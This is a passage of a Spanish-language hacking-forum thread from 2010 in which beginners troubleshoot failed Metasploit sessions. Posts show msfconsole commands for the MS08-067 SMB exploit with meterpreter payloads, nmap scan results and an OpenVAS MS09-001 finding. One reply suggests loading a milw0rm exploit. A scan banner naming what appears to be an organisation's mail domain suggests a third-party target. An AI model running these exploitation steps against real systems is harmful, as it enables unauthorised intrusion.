elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Sesion con metaexploit
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: Sesion con metaexploit  (Leído 23,234 veces)
chorchas

Desconectado Desconectado

Mensajes: 14



Ver Perfil
Sesion con metaexploit
« en: 17 Mayo 2010, 00:55 am »

Hola a todos este es mi primer post, aunque llevo mucho leyendo y probando cosillas. Y la verdad es que estoy aprendiendo muchísimo.

He estado probando con metaesploit desde ubuntu 10.4 y lo he instalado pero haga lo que haga nunca consigo abrir sesión aplique lo que aplique. Lo estoy probando contra Windows XP con SP3 y Windows 2003 Server. ¿Podrias hecharme una mano?
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: Sesion con metaexploit
« Respuesta #1 en: 17 Mayo 2010, 01:21 am »

Escaneaste el sistema remoto en busca de vulnerabilidades? Si no lo haz hecho, HAZLO!
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
jcrack

Desconectado Desconectado

Mensajes: 150


Ver Perfil
Re: Sesion con metaexploit
« Respuesta #2 en: 17 Mayo 2010, 07:26 am »

 :D
hola ,tengo el mismo problema y soy novato por favor si alguien puede ayudarme.
yo solo hago click aqui y aya para ver que pasa y si no ...da igual...algo puede salir
#! /los pasos que hice son:
inicie el framework metasploit  msfconsole >nmap -sV 192.168.1.7
//encontre los siguiente puertos disponibles: "un FIREWALL presente" >:(
 /* 445/tcp filtered!open microsoft-ds */
/* 43690 udp filtered|open */

>use windows/smb/ms08_067_netapi
>set RHOST 192.168.1.7
>set PAYLOAD windows/meterpreter/bind_tcp
/* aqui tambien uso reverse_tcp para ver si puedo pasar el firewall */
>set targets $A   // osea el numero del OS
>exploit
 :-(
/* bien es el fin de mi camino y de aqui no paso , me sale un mensaje que
 toda la configuracion esta correcta pero que no puedo obtener la sesion

 mi pregunta es ???????? es el firewall que no me deja pasar o es solo
que hago  algo mal  en los pasos antes indicados  */

 gracias anticipadamente por la respuesta o por la amonestacion si esta me llega

En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: Sesion con metaexploit
« Respuesta #3 en: 17 Mayo 2010, 07:32 am »

mi pregunta es ???????? es el firewall que no me deja pasar o es solo
que hago  algo mal  en los pasos antes indicados  */
En está ocasión,lo más seguro es que sea por el FW!

... o por la amonestacion si esta me llega
jajajajajajjajajajajajaja
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
chorchas

Desconectado Desconectado

Mensajes: 14



Ver Perfil
Re: Sesion con metaexploit
« Respuesta #4 en: 17 Mayo 2010, 09:36 am »

Alex@ShellRoot si lo he escaneado y no tengo firewall de hecho en las ultimas pruebas que realice lo hice con una maquina recien instalada y con los servicios de ftp smtp http ldap, mas los que deja de serie, ahora no estoy en el trabajo pero si puedo capturo una imagen. Le habilite estos servicios precisamente para hacer pruebas.


« Última modificación: 17 Mayo 2010, 16:57 pm por chorchas » En línea

chorchas

Desconectado Desconectado

Mensajes: 14



Ver Perfil
Re: Sesion con metaexploit
« Respuesta #5 en: 17 Mayo 2010, 16:58 pm »

Alex@ShellRoot si lo he escaneado y no tengo firewall de hecho en las ultimas pruebas que realice lo hice con una maquina recien instalada y con los servicios de ftp smtp http ldap, mas los que deja de serie, ahora no estoy en el trabajo pero si puedo capturo una imagen. Le habilite estos servicios precisamente para hacer pruebas.
Esto es lo que me sale:
  • Started bind handler
  • Automatically detecting the target...
  • Fingerprint: Windows 2003 Service Pack 2 - lang:Unknown
  • Could not determine the exact language pack
  • Exploit completed, but no session was created.

Y el resultado del nmap es:

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
25/tcp   open  smtp          Alt-N MDaemon mail server 10.0.0
53/tcp   open  domain        Microsoft DNS
80/tcp   open  http          Microsoft IIS webserver 6.0
88/tcp   open  kerberos-sec  Microsoft Windows kerberos-sec
110/tcp  open  pop3
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn
143/tcp  open  imap          Alt-N MDaemon imapd 10.0.0
301/tcp  open  ssl/http      World Client WDaemon httpd 10.0.0
366/tcp  open  smtp          Alt-N MDaemon mail server 10.0.0
389/tcp  open  ldap
445/tcp  open  microsoft-ds  Microsoft Windows 2003 microsoft-ds
464/tcp  open  tcpwrapped
587/tcp  open  smtp          MDaemon smtpd 10.0.0 (MSA support)
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
1000/tcp open  http          World Client WDaemon httpd 3.0
1026/tcp open  msrpc         Microsoft Windows RPC
1027/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
1034/tcp open  msrpc         Microsoft Windows RPC
1061/tcp open  msrpc         Microsoft Windows RPC
1084/tcp open  msrpc         Microsoft Windows RPC
3389/tcp open  microsoft-rdp Microsoft Terminal Service
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port110-TCP:V=5.00%I=7%D=5/17%Time=4BF1588C%P=x86_64-unknown-linux-gnu%
SF:r(NULL,65,"\+OK\x20colegiosma\.com\x20POP3\x20MDaemon\x2010\.0\.0\x20re
SF:ady\x20<MDAEMON-F201005171649\.AA4925250MD6216@colegiosma\.com>\r\n")%r
SF:(GenericLines,81,"\+OK\x20colegiosma\.com\x20POP3\x20MDaemon\x2010\.0\.
SF:0\x20ready\x20<MDAEMON-F201005171649\.AA4925250MD6216@colegiosma\.com>\
SF:r\n-ERR\x20unknown\x20POP3\x20command!\r\n");
En línea

chorchas

Desconectado Desconectado

Mensajes: 14



Ver Perfil
Re: Sesion con metaexploit
« Respuesta #6 en: 17 Mayo 2010, 23:53 pm »

Alguna ayuda???????

creo que puede ser algo del idioma por que es lo unico que no coincide en las capturas ¿Como puedo arreglarlo?
En línea

chorchas

Desconectado Desconectado

Mensajes: 14



Ver Perfil
Re: Sesion con metaexploit
« Respuesta #7 en: 18 Mayo 2010, 19:12 pm »

Alguna ayuda???????

creo que puede ser algo del idioma por que es lo único que no coincide en las capturas ¿Como puedo arreglarlo?

¿Hola? he solucionado lo del idioma buscando un nuevo objetivo. He escaneado con openvas y si tengo el puerto 445  como vulnerabilidad en Windows y aun así no abre sesión.

No se muy bien como seguir, he mirado manuales en el foro el de metasploit en ingles y español y no veo nada, y si no se usar este que parece el de los mas sencillos ni me planteo otros.

Lo dicho una ayudita estaria bien


EDITO: Esto es lo que me sale con openvas que es como nessus
Reportado por NVT "Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Remote" (1.3.6.1.4.1.25623.1.0.900233):



  Overview: This host has critical security update missing according to
  Microsoft Bulletin MS09-001.

  Vulnerability Insight:
  The issue is due to the way Server Message Block (SMB) Protocol software
  handles specially crafted SMB packets.

  Impact: Successful exploitation could allow remote unauthenticated attackers
  to cause denying the service by sending a specially crafted network message
  to a system running the server service.

  Impact Level: System/Network

  Affected Software/OS:
  Microsoft Windows 2K Service Pack 4 and prior.
  Microsoft Windows XP Service Pack 3 and prior.
  Microsoft Windows 2003 Service Pack 2 and prior.

  Fix: Run Windows Update and update the listed hotfixes or download and
  update mentioned hotfixes in the advisory from the below link,
  http://www.microsoft.com/technet/security/bulletin/ms09-001.mspx

  References:
  http://www.milw0rm.com/exploits/6463
  http://www.microsoft.com/technet/security/bulletin/ms09-001.mspx

  CVSS Score:
    CVSS Base Score     : 7.1 (AV:N/AC:M/Au:NR/C:N/I:N/A:C)
    CVSS Temporal Score : 5.6
  Risk factor : High
CVE : CVE-2008-4114, CVE-2008-4834, CVE-2008-4835
BID : 31179
« Última modificación: 18 Mayo 2010, 20:40 pm por chorchas » En línea

soez

Desconectado Desconectado

Mensajes: 76



Ver Perfil
Re: Sesion con metaexploit
« Respuesta #8 en: 19 Mayo 2010, 00:20 am »

Ahi mismo en la pagina de milw0rm tienes el exploit a usar, que está en ruby, lo guardas con la extension .rb y lo metes en la carpeta smb en la parte de exploits de metasploit, le cargas el payload y lo lanzas. De todos modos metasploit lo tendra ya seguramente. Pon desde la consola, use windows/smb/MS09-001 y sigue las opciones, si no está actualizalo. Saludos
En línea

01001010 01100001 01110110 01101001 01100101 01110010
chorchas

Desconectado Desconectado

Mensajes: 14



Ver Perfil
Re: Sesion con metaexploit
« Respuesta #9 en: 19 Mayo 2010, 17:48 pm »

Ahi mismo en la pagina de milw0rm tienes el exploit a usar, que está en ruby, lo guardas con la extension .rb y lo metes en la carpeta smb en la parte de exploits de metasploit, le cargas el payload y lo lanzas. De todos modos metasploit lo tendra ya seguramente. Pon desde la consola, use windows/smb/MS09-001 y sigue las opciones, si no está actualizalo. Saludos

De entrada muchas gracias.

He hecho o que me comentas he creado un fichero con extension rb, msf09_01.rb, y lo he dejado en el directorio que me indicas, pero el msf no lo reconoce como exploit.
cuando hago un use exploit/windows/smb no lo detecta , he probado a poner load o reload pero no me hace nada alcontrario me da un fallo.

No se si tengo algo mas que hacer. Estoy usando la siguiente version
msf > version
Framework: 3.4.0-release.9321
Console  : 3.4.0-release.9280
En línea

Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
problema al instalar metaexploit
Bugs y Exploits
xemnas 0 2,335 Último mensaje 20 Enero 2011, 14:42 pm
por xemnas
Encoders a un payload binario en metaexploit
Hacking
dairus20 1 3,151 Último mensaje 28 Marzo 2011, 00:17 am
por dairus20
problema con metaexploit
Hacking
HALC12 5 4,831 Último mensaje 12 Agosto 2011, 11:37 am
por moikano→@
metaexploit a un dd-wrt
Hacking
angeluss 1 4,897 Último mensaje 24 Agosto 2011, 20:08 pm
por Ivanchuk
monitorizaractividad en un pccon windows7 con metaexploit
Bugs y Exploits
bumerman 1 3,032 Último mensaje 3 Enero 2012, 23:35 pm
por CloudswX
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines